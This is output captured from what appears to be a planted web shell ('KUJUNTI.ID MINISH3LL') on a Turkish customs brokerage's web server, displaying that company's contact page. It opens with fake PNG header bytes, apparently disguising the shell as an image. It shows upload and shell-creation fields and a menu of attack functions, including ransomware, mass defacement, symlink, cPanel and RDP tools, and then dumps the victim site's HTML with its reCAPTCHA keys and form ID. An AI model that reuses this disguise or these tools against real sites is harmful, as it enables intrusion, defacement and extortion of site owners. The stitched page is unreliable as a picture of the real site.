\x89PNG\r\n\x1a\n\x00\x00\x00\x0DIHDR\x00\x00\x00\x01\x00 \x00\x00\x01\x08\x06\x00\x00\x00\x1F\x15\xC4\x89\x00\x00\x00 \x0AIDATx\x9Ccb\x00\x00\x00\x06\x00\x03\x1A\x05\x9D\x00\x00 \x00\x00IEND\xAE\x42\x60\x82 www.csarite.com
KUJUNTI.ID MINISH3LL
Path : /var/www/html/zetgumruk.com/
(S)h3ll Cr3at0r :
F!le Upl0ad :

B-Con CMD Config cPanel C-Rdp D-Log Info Jump Mass Ransom Symlink vHost Zone-H

Current File : /var/www/html/zetgumruk.com/iletişim.html


<!DOCTYPE html>
<html style="font-size: 16px;" lang="tr-TR"><head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta charset="utf-8">
    <meta name="keywords" content="Zet Gümrük Müşavirliği Ltd.Şti., Contact Us">
    <meta name="description" content="Gümrük müşavirliği ve dış ticaret danışmanlık hizmetleri...">
    <title>iletişim</title>
<script>
    function gdprConfirmed() {
        return document.cookie.split(';').filter(function(item) {
            var val = item.trim().split('=');
            val = decodeURIComponent(val[1] || '');
            try { val = JSON.parse(val); } catch (e) { val = {}; }
            return val && val.analytics;
        }).length;
    }
    if (gdprConfirmed()) {
    document.write("\
    <!-- Google Tag Manager -->\
    <gascript>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':\
    new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],\
    j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=\
    'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);\
    })(window,document,'script','dataLayer',' GTM-W6L99TLP');</gascript>\
    <!-- End Google Tag Manager -->\
    ".replace(/gascript/g, 'script'));
    }
    </script>
    <link rel="stylesheet" href="nicepage.css" media="screen">
<link rel="stylesheet" href="iletişim.css" media="screen">
    <script class="u-script" type="text/javascript" src="jquery.js" defer=""></script>
    <script class="u-script" type="text/javascript" src="nicepage.js" defer=""></script>
    <meta name="generator" content="Nicepage 7.13.0, nicepage.com">
    <meta name="referrer" content="origin">
    
    
    
    <link id="u-page-google-font" rel="stylesheet" href="iletişim-fonts.css">
    <script type="application/ld+json">{
		"@context": "http://schema.org",
		"@type": "Organization",
		"name": "zetgumruk",
		"logo": "images/logo11.jpg",
		"sameAs": [
				"https://www.igmd.org.tr/",
				"https://www.resmigazete.gov.tr/",
				"https://ticaret.gov.tr/"
		]
}</script>
    <meta name="theme-color" content="#478ac9">
    <meta property="og:title" content="iletişim">
    <meta property="og:description" content="Gümrük müşavirliği ve dış ticaret danışmanlık hizmetleri...">
    <meta property="og:type" content="website">
  <meta name="referrer" content="origin"><script>
    window.recaptchaRenderedV2 = false;
    window.recaptchaFallback = false;
    window.recaptchaSiteKeyV2 = '6LdfeIwrAAAAAMnDkaIExdHsV0Nsj8y-CU9AyTjZ';

    function gdprConfirmed() {
        return document.cookie.split(';').filter(function(item) {
            var val = item.trim().split('=');
            val = decodeURIComponent(val[1] || '');
            try { val = JSON.parse(val); } catch (e) { val = {}; }
            return val && val.submissions;
        }).length;
    }

    function dynamicLoadScript() {
        var script = document.createElement('script');
        script.src = 'https://www.google.com/recaptcha/enterprise.js?render=6LfuKdAqAAAAAMAApm521grIwJN0u66KIBAzzZcY';
        script.async = true;
        script.onload = function () {
            var event = new CustomEvent("recaptchaLoaded");
            document.dispatchEvent(event);
        };
        document.body.appendChild(script);
    }

    function showRecaptchaError(error) {
        error = error || '';
        var formError = document.querySelector('.u-form-send-error');

        if (formError) {
            formError.innerText = 'Site Sahibi Hatası: ' + error.replace(/:[\s\S]*/, '');
            formError.style.display = 'block';
        }

        console.error('Error in grecaptcha: ', error);
    }

    document.addEventListener('DOMContentLoaded', function () {
        var confirmButtons = document.querySelectorAll('.u-cookies-consent .u-button-confirm');
        confirmButtons.forEach(function (button) {
            button.onclick = dynamicLoadScript;
        });
    });
    </script>

    <script>
        document.addEventListener("DOMContentLoaded", function(){
            if (!gdprConfirmed()) {
                return;
            }
            dynamicLoadScript();
        });
    </script>

    <script>
        document.addEventListener("recaptchaLoaded", function() {
            if (!gdprConfirmed()) {
                return;
            }

            (function (grecaptcha, sitekey, actions) {
                var recaptcha = {
                    execute: function (action, submitFormCb) {
                        if (typeof grecaptcha === 'undefined' || typeof grecaptcha.execute !== 'function') {
                            showRecaptchaError('reCAPTCHA script failed to load.');
                            return;
                        }

                        try {
                            grecaptcha.execute(sitekey, {action: action}).then((token) => {
                                if (!token) {
                                    throw new Error('Empty token received from reCAPTCHA');
                                }

                                var forms = document.getElementsByTagName('form');

                                for (var i = 0; i < forms.length; i++) {
                                    var response = forms[i].querySelector('[name="recaptchaResponse"]');

                                    if (!response) {
                                        response = document.createElement('input');
                                        response.setAttribute('type', 'hidden');
                                        response.setAttribute('name', 'recaptchaResponse');
                                        forms[i].appendChild(response);
                                    }

                                    response.value = token;
                                }

                                submitFormCb();
                            }).catch((e) => {
                                showRecaptchaError(e.message);
                            });
                        } catch (e) {
                            showRecaptchaError(e.message);
                        }
                    },

                    executeContact: function (submitFormCb) {
                        recaptcha.execute(actions['contact'], submitFormCb);
                    }
                };

                window.recaptchaObject = recaptcha;
                window.grecaptchaObject = grecaptcha;
            })(
                
                grecaptcha.enterprise,
                '6LfuKdAqAAAAAMAApm521grIwJN0u66KIBAzzZcY',
                {'contact': 'contact'}
            );
        });
    </script>

    <script>
    window.showRecaptchaV2 = function (form) {
        if (!form || !form.length) {
            return;
        }
        if (typeof window.grecaptchaObject === 'undefined' || !window.grecaptchaObject) {
            return;
        }

        const formEl = form[0];

        let container = document.getElementById('recaptcha-v2-container');
        if (!container) {
            container = document.createElement('div');
            container.id = 'recaptcha-v2-container';
            formEl.parentElement.appendChild(container);
        }

        let tokenReceived = false;
        let timeoutHandle;

        if (window.recaptchaRenderedV2 === false || typeof window.recaptchaRenderedV2 === 'undefined') {
            window.recaptchaRenderedV2 = window.grecaptchaObject.render('recaptcha-v2-container', {
                'sitekey': window.recaptchaSiteKeyV2,
                'size': 'invisible',
                'callback': function (token) {
                    clearTimeout(timeoutHandle);

                    if (!token) {
                        showRecaptchaError('reCAPTCHA v2 token was empty. Please try again.');
                        return;
                    }

                    tokenReceived = true;

                    let recaptchaResponseV2 = formEl.querySelector('input[name="recaptchaResponseV2"]');

                    if (!recaptchaResponseV2) {
                        recaptchaResponseV2 = document.createElement('input');
                        recaptchaResponseV2.type = 'hidden';
                        recaptchaResponseV2.name = 'recaptchaResponseV2';
                        formEl.appendChild(recaptchaResponseV2);
                    }

                    recaptchaResponseV2.value = token;

                    if (window.recaptchaSiteKeyV2) {
                        let siteKeyInput = formEl.querySelector('input[name="siteKey"]');

                        if (siteKeyInput) {
                            siteKeyInput.value = window.recaptchaSiteKeyV2;
                        }
                    }

                    document.querySelectorAll('.u-form-send-error').forEach(el => {
                        el.style.display = 'none';
                    });

                    const event = new CustomEvent('submit', {
                        detail: { recaptchaPassed: true },
                        bubbles: true,
                        cancelable: true,
                    });

                    formEl.dispatchEvent(event);
                },
                'error-callback': function () {
                    clearTimeout(timeoutHandle);
                    showRecaptchaError('reCAPTCHA v2 error. Please try again.');
                },
                'expired-callback': function () {
                    clearTimeout(timeoutHandle);
                }
            });

            window.grecaptchaObject.reset(window.recaptchaRenderedV2);

            setTimeout(() => {
                window.grecaptchaObject.execute(window.recaptchaRenderedV2);
            }, 300);

            timeoutHandle = setTimeout(function () {
                if (!tokenReceived) {
                    showRecaptchaError('The Contact Form could not be submitted because Google reCAPTCHA v3 detected unusual activity from your connection. Please try again later, or complete the reCAPTCHA v2 challenge if it appears.');
                }
            }, 120000);
        } else {
            window.grecaptchaObject.reset(window.recaptchaRenderedV2);

            setTimeout(() => {
                window.grecaptchaObject.execute(window.recaptchaRenderedV2);
            }, 300);
        }
    };
    </script>
<meta data-intl-tel-input-cdn-path="intlTelInput/"></head>
  <body data-path-to-root="./" data-include-products="false" class="u-body u-clearfix u-xl-mode" data-lang="tr"><!-- Google Tag Manager (noscript) -->
    <noscript><iframe src="https://www.googletagmanager.com/ns.html?id= GTM-W6L99TLP" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
<!-- End Google Tag Manager (noscript) --><header class="u-clearfix u-header u-header" id="sec-0c70"><div class="u-clearfix u-sheet u-sheet-1">
        <a href="www.zetgumruk.com.tr" class="u-image u-logo u-image-1" data-image-width="2040" data-image-height="1904">
          <img src="images/logo11.jpg" class="u-logo-image u-logo-image-1">
        </a>
        <nav class="u-menu u-menu-one-level u-offcanvas u-menu-1" role="navigation" aria-label="Menu navigation">
          <div class="menu-collapse" style="font-size: 1rem; letter-spacing: 0px; font-weight: 700;">
            <a class="u-button-style u-custom-active-color u-custom-color u-custom-effect-duration u-custom-left-right-menu-spacing u-custom-padding-bottom u-custom-top-bottom-menu-spacing u-hamburger-link u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="#" data-lang-en="{&quot;content&quot;:&quot;<svg class=\&quot;u-svg-link\&quot; viewBox=\&quot;0 0 24 24\&quot;><use xlink:href=\&quot;#menu-hamburger\&quot;></use></svg><svg class=\&quot;u-svg-content\&quot; version=\&quot;1.1\&quot; id=\&quot;menu-hamburger\&quot; viewBox=\&quot;0 0 16 16\&quot; x=\&quot;0px\&quot; y=\&quot;0px\&quot; xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xmlns=\&quot;http://www.w3.org/2000/svg\&quot;>    <g>        <rect y=\&quot;1\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;7\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;13\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>    </g></svg>&quot;,&quot;href&quot;:&quot;#&quot;}" data-lang-tr="{&quot;content&quot;:&quot;<svg class=\&quot;u-svg-link\&quot; viewBox=\&quot;0 0 24 24\&quot;><use xlink:href=\&quot;#menu-hamburger\&quot;></use></svg><svg class=\&quot;u-svg-content\&quot; version=\&quot;1.1\&quot; id=\&quot;menu-hamburger\&quot; viewBox=\&quot;0 0 16 16\&quot; x=\&quot;0px\&quot; y=\&quot;0px\&quot; xmlns:xlink=\&quot;http://www.w3.org/1999/xlink\&quot; xmlns=\&quot;http://www.w3.org/2000/svg\&quot;>    <g>        <rect y=\&quot;1\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;7\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>        <rect y=\&quot;13\&quot; width=\&quot;16\&quot; height=\&quot;2\&quot;></rect>    </g></svg>&quot;,&quot;href&quot;:&quot;#&quot;}">
              <svg class="u-svg-link" viewBox="0 0 24 24"><use xlink:href="#menu-hamburger"></use></svg>
              <svg class="u-svg-content" version="1.1" id="menu-hamburger" viewBox="0 0 16 16" x="0px" y="0px" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns="http://www.w3.org/2000/svg"><g><rect y="1" width="16" height="2"></rect><rect y="7" width="16" height="2"></rect><rect y="13" width="16" height="2"></rect>
</g></svg>
            </a>
          </div>
          <div class="u-custom-menu u-nav-container">
            <ul class="u-custom-font u-heading-font u-nav u-unstyled u-nav-1" role="menubar"><li class="u-nav-item" role="none"><a class="u-button-style u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="./" style="padding: 16px 28px;" role="menuitem">Anasayfa</a>
</li><li class="u-nav-item" role="none"><a class="u-button-style u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="iletişim.html" style="padding: 16px 28px;" role="menuitem">İletişim</a>
</li><li class="u-nav-item" role="none"><a class="u-button-style u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="https://webgumruk.com/authentication/login.xhtml" target="_blank" style="padding: 16px 28px;" role="menuitem">Webgümrük</a>
</li><li class="u-nav-item" role="none"><a class="u-button-style u-nav-link u-text-active-palette-1-base u-text-hover-palette-2-base" href="https://mail.zetgumruk.com.tr/" target="_blank" style="padding: 16px 28px;" tabindex="-1" role="menuitem">Kurum İçi İletişim</a>
</li></ul>
          </div>
          <div class="u-custom-menu u-nav-container-collapse" id="0643" role="region" aria-label="Menu panel">
            <div class="u-black u-container-style u-inner-container-layout u-opacity u-opacity-95 u-sidenav">
              <div class="u-inner-container-layout u-sidenav-overflow">
                <div class="u-menu-close" tabindex="-1" aria-label="Close menu"></div>
                <ul class="u-align-center u-nav u-popupmenu-items u-unstyled u-nav-2"><li class="u-nav-item"><a class="u-button-style u-nav-link" href="./">Anasayfa</a>
</li><li class="u-nav-item"><a class="u-button-style u-nav-link" href="iletişim.html">İletişim</a>
</li><li class="u-nav-item"><a class="u-button-style u-nav-link" href="https://webgumruk.com/authentication/login.xhtml" target="_blank">Webgümrük</a>
</li><li class="u-nav-item"><a class="u-button-style u-nav-link" href="https://mail.zetgumruk.com.tr/" target="_blank">Kurum İçi İletişim</a>
</li></ul>
              </div>
            </div>
            <div class="u-black u-menu-overlay u-opacity u-opacity-70"></div>
          </div>
        </nav>
        <h1 class="u-text u-text-1">Zet Gümrük Müşavirliği Ltd.Şti.</h1>
      </div></header>
    <section class="u-clearfix u-image u-shading u-section-1" id="carousel_4237" data-image-width="1620" data-image-height="1080">
      <div class="u-clearfix u-sheet u-valign-middle-lg u-valign-middle-md u-valign-middle-sm u-valign-middle-xs u-sheet-1">
        <div class="data-layout-selected u-clearfix u-expanded-width u-gutter-0 u-layout-wrap u-layout-wrap-1">
          <div class="u-layout">
            <div class="u-layout-row">
              <div class="u-align-left u-container-align-left u-container-style u-layout-cell u-left-cell u-size-27-xl u-size-29-lg u-size-29-md u-size-29-sm u-size-29-xs u-layout-cell-1">
                <div class="u-container-layout u-valign-bottom-lg u-valign-bottom-md u-valign-bottom-sm u-valign-bottom-xs u-container-layout-1">
                  <h2 class="u-text u-text-1">İletişim&nbsp;</h2>
                  <div class="u-list u-list-1">
                    <div class="u-repeater u-repeater-1">
                      <div class="u-container-style u-list-item u-repeater-item u-shape-rectangle">
                        <div class="u-container-layout u-similar-container u-container-layout-2">
                          <h5 class="u-custom-item u-text u-text-2"><span class="u-file-icon u-icon u-text-palette-3-base u-icon-1" data-animation-name="" data-animation-duration="0" data-animation-delay="0" data-animation-direction=""><img src="images/1082334-7e88f7ff.png" alt=""></span>&nbsp;
                          </h5>
                          <p class="u-text u-text-3">+90 (212) 552-2402</p>
                        </div>
                      </div>
                      <div class="u-container-style u-list-item u-repeater-item u-shape-rectangle">
                        <div class="u-container-layout u-similar-container u-container-layout-3">
                          <h5 class="u-custom-item u-hover-feature u-text u-text-4">
                            <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-palette-4-light-2 u-btn-1" href="https://maps.app.goo.gl/aFwvbZMfPNpdnVU57" target="_blank"><span class="u-file-icon u-icon u-text-palette-3-base u-icon-2" data-href="https://maps.app.goo.gl/aFwvbZMfPNpdnVU57" data-target="_blank" data-animation-name="" data-animation-duration="0" data-animation-delay="0" data-animation-direction=""><img src="images/205d33fb-71c4-40dc-a07f-7a1273e85973-1b7b35bd.png" alt=""></span>Google maps için tıklayınız
                            </a>
                          </h5>
                          <p class="u-text u-text-5">
                            <a class="u-active-none u-border-none u-btn u-button-link u-button-style u-hover-none u-none u-text-white u-btn-2" href="https://maps.app.goo.gl/aFwvbZMfPNpdnVU57" target="_blank">Adnan Kahveci Mh. Yavuz Sultan Selim Blv. Perlavista Rez. B Blok, Kat:1, No:5, 34528 Beylikdüzü - İstanbul <br>
                              <br>
                            </a>
                          </p>
                        </div>
                      </div>
                      <div class="u-container-style u-list-item u-repeater-item u-shape-rectangle">
                        <div class="u-container-layout u-similar-container u-container-layout-4">
                          <h5 class="u-custom-item u-text u-text-6"><span class="u-file-icon u-icon u-text-palette-3-base u-icon-3" data-animation-name="" data-animation-duration="0" data-animation-delay="0" data-animation-direction=""><img src="images/2791568-64f4784e.png" alt=""></span>Çalışma Saatleri
                          </h5>
                          <p class="u-text u-text-7">Hafta içi: 08.30 - 12.00 / 13.00 - 18.00<br>
                            <br>
                          </p>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div class="u-container-style u-layout-cell u-right-cell u-size-31-lg u-size-31-md u-size-31-sm u-size-31-xs u-size-33-xl u-layout-cell-2">
                <div class="u-container-layout u-valign-middle-xl u-container-layout-5">
                  <div class="u-expanded-width-md u-expanded-width-sm u-expanded-width-xs u-form u-form-1">
                    <form action="https://forms.nicepagesrv.com/v2/form/process" class="u-clearfix u-form-spacing-30 u-form-vertical u-inner-form" style="padding: 10px" source="email" name="form">
                      <div class="u-form-email u-form-group u-form-partition-factor-2">
                        <label class="u-label u-text-body-alt-color u-label-1">Email</label>
                        <input type="email" placeholder="Enter a valid email address" id="email-319a" name="email" class="u-border-2 u-border-no-left u-border-no-right u-border-no-top u-border-white u-input u-input-rectangle" required="">
                      </div>
                      <div class="u-form-group u-form-name u-form-partition-factor-2">
                        <label class="u-label u-text-body-alt-color u-label-2">Ad - Soyad</label>
                        <input type="text" placeholder="Enter your Name" id="name-319a" name="name" class="u-border-2 u-border-no-left u-border-no-right u-border-no-top u-border-white u-input u-input-rectangle" required="">
                      </div>
                      <div class="u-form-address u-form-group u-form-group-3">
                        <label class="u-label u-text-body-alt-color u-label-3">Adres</label>
                        <input type="text" placeholder="Optional" id="address-452f" name="address" class="u-border-2 u-border-no-left u-border-no-right u-border-no-top u-border-white u-input u-input-rectangle">
                      </div>
                      <div class="u-form-group u-form-message">
                        <label class="u-label u-text-body-alt-color u-label-4">Mesajınız</label>
                        <textarea placeholder="Enter your message" id="message-319a" name="message" class="u-border-2 u-border-no-left u-border-no-right u-border-no-top u-border-white u-input u-input-rectangle" required=""></textarea>
                      </div>
                      <div class="u-align-left u-form-group u-form-submit">
                        <a href="#" class="u-active-white u-border-none u-btn u-btn-round u-btn-submit u-button-style u-hover-white u-palette-3-base u-radius-50 u-btn-3">Submit</a>
                        <input type="submit" value="submit" class="u-form-control-hidden">
                      </div>
                      <div class="u-form-send-message u-form-send-success"> Thank you! Your message has been sent. </div>
                      <div class="u-form-send-error u-form-send-message"> Unable to send your message. Please fix errors then try again. </div>
                      <input type="hidden" value="" name="recaptchaResponse">
                      <input type="hidden" name="formServices" value="d29344a0-5a06-a7cf-12d6-7e5fb646cd0d">
                      <input type="hidden" name="siteKey" value="6LfuKdAqAAAAAMAApm521grIwJN0u66KIBAzzZcY">
                    </form>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
      
    </section>
    
    
    
    <footer class="u-align-center-md u-align-center-sm u-align-center-xs u-clearfix u-footer u-grey-80" id="sec-77db"><div class="u-clearfix u-sheet u-sheet-1">
        <div class="u-align-left u-social-icons u-social-icons-1">
          <a class="u-social-url" title="İGMD" target="_blank" href="https://www.igmd.org.tr/"><span class="u-file-icon u-icon u-social-facebook u-social-icon u-icon-1"><img src="images/igmdlogo-mini-lg.png" alt=""></span>
          </a>
          <a class="u-social-url" title="Resmi Gazete" target="_blank" href="https://www.resmigazete.gov.tr/"><span class="u-file-icon u-icon u-social-icon u-social-twitter u-icon-2"><img src="images/resmigazete.png" alt=""></span>
          </a>
          <a class="u-social-url" title="TC Ticaret Bakanlığı" target="_blank" href="https://ticaret.gov.tr/"><span class="u-file-icon u-icon u-social-icon u-social-instagram u-icon-3"><img src="images/logo-e.png" alt=""></span>
          </a>
        </div>
        <p class="u-align-center-lg u-align-center-md u-align-center-xl u-text u-text-1">Hızlı ve güvenilir hizmet...</p>
      </div></footer><section class="u-align-center u-clearfix u-cookies-consent u-grey-80 u-cookies-consent" id="sec-f8cb">
      <div class="u-clearfix u-sheet u-valign-middle u-sheet-1">
        <div class="u-clearfix u-expanded-width u-layout-wrap u-layout-wrap-1">
          <div class="u-gutter-0 u-layout">
            <div class="u-layout-row">
              <div class="u-container-style u-layout-cell u-left-cell u-size-43-md u-size-43-sm u-size-43-xs u-size-46-lg u-size-46-xl u-layout-cell-1">
                <div class="u-container-layout u-valign-middle u-container-layout-1">
                  <h3 class="u-text u-text-default u-text-1">Cookies &amp; Privacy</h3>
                  <p class="u-text u-text-default u-text-2">This website uses cookies to ensure you get the best experience on our website.</p>
                </div>
              </div>
              <div class="u-align-left u-container-style u-layout-cell u-right-cell u-size-14-lg u-size-14-xl u-size-17-md u-size-17-sm u-size-17-xs u-layout-cell-2">
                <div class="u-container-layout u-valign-middle-lg u-valign-middle-md u-valign-middle-xl u-valign-top-sm u-valign-top-xs u-container-layout-2">
                  <a href="###" class="u-btn u-button-confirm u-button-style u-palette-1-base u-btn-1">Confirm</a>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    <style> .u-cookies-consent {
  background-image: none;
}

.u-cookies-consent .u-sheet-1 {
  min-height: 212px;
}

.u-cookies-consent .u-layout-wrap-1 {
  margin-top: 30px;
  margin-bottom: 30px;
}

.u-cookies-consent .u-layout-cell-1 {
  min-height: 152px;
}

.u-cookies-consent .u-container-layout-1 {
  padding: 30px 60px;
}

.u-cookies-consent .u-text-1 {
  margin-top: 0;
  margin-right: 20px;
  margin-bottom: 0;
}

.u-cookies-consent .u-text-2 {
  margin: 8px 20px 0 0;
}

.u-cookies-consent .u-layout-cell-2 {
  min-height: 152px;
}

.u-cookies-consent .u-container-layout-2 {
  padding: 30px;
}

.u-cookies-consent .u-btn-1 {
  margin: 0 auto 0 0;
}

@media (max-width: 1199px) {
  .u-cookies-consent .u-sheet-1 {
    min-height: 131px;
  }

  .u-cookies-consent .u-layout-cell-1 {
    min-height: 125px;
  }

  .u-cookies-consent .u-text-1 {
    margin-right: 0;
  }

  .u-cookies-consent .u-text-2 {
    margin-right: 0;
  }

  .u-cookies-consent .u-layout-cell-2 {
    min-height: 125px;
  }
}

@media (max-width: 991px) {
  .u-cookies-consent .u-sheet-1 {
    min-height: 106px;
  }

  .u-cookies-consent .u-layout-cell-1 {
    min-height: 100px;
  }

  .u-cookies-consent .u-container-layout-1 {
    padding-left: 30px;
    padding-right: 30px;
  }

  .u-cookies-consent .u-layout-cell-2 {
    min-height: 100px;
  }
}

@media (max-width: 767px) {
  .u-cookies-consent .u-sheet-1 {
    min-height: 225px;
  }

  .u-cookies-consent .u-layout-cell-1 {
    min-height: 154px;
  }

  .u-cookies-consent .u-container-layout-1 {
    padding-left: 10px;
    padding-right: 10px;
    padding-bottom: 20px;
  }

  .u-cookies-consent .u-layout-cell-2 {
    min-height: 65px;
  }

  .u-cookies-consent .u-container-layout-2 {
    padding: 10px;
  }
}

@media (max-width: 575px) {
  .u-cookies-consent .u-sheet-1 {
    min-height: 121px;
  }

  .u-cookies-consent .u-layout-cell-1 {
    min-height: 100px;
  }

  .u-cookies-consent .u-layout-cell-2 {
    min-height: 15px;
  }
}</style></section>
  
</body></html>

© KUJUNTI.ID